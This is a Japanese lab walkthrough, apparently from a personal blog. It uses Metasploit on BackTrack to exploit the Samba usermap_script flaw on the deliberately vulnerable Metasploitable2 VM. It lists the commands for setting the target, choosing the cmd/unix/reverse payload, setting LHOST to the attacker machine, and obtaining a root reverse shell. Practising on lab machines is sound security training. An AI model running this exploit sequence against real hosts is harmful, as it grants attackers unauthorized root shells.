metasploitable2 samba攻略

metasploitable2 samba攻略
virtualbox を起動し
BT5R3
metasploitable2
を起動
以下、BT5R3 の操作
まず root でログインして
startx で X windows 起動
service nessusd start
でNessus起動
msfconsole

MSF起動
load nessus
で MSFから Nessus 接続機能ロード
nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続
search samba
で samba の脆弱性を調べる
この中から
use exploit/multi/samba/usermap_script
で使用する Exploit を指定
次に指定可能なオプションを
show options
で確認
オプションの確認ができたら
RHOST、つまり対象の設定
set RHOST 192.168.10.214
次に show payloads
を実行して、実行可能な payload の確認
この中から指定する payload の指定をする
set payload cmd/unix/reverse
一覧のときには
payloads なのに、
セットするときには payload なので注意
reverse では
相手側から自ホスト側に接続が行われるので
自ホスト側の設定が必要になるので
show options
でオプションを確認すると
LHOST
LPORT
の設定がでているのが確認できるので
設定する
オプションで確認したときに
Required のところに yes となっているけど
これは必須項目という意味
とりあえず、自マシンのIPが必要なので
ifconfig で調べて
set LHOST 192.168.10.174
というように
set LHOST BT5R3のIPアドレス
と設定する
これをやらないと exploit が実行できない
これで、再び
show options
で設定を確認して LHOST にIPアドレスが
設定されたか確認する
ここまでできたら、
exploit
で実行
Command shell session 1 opened
となるまで待つ
あとは、 vsftpd のときと同じように
id;
でroot 権限になっているか
ifconfig:
でIPの確認
などで権限やリモートシェルの確認ができればOK
終了したいときには
Ctrl + c で
Abort session 1? [y/N] y
で終了できる
今回の参考書籍

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です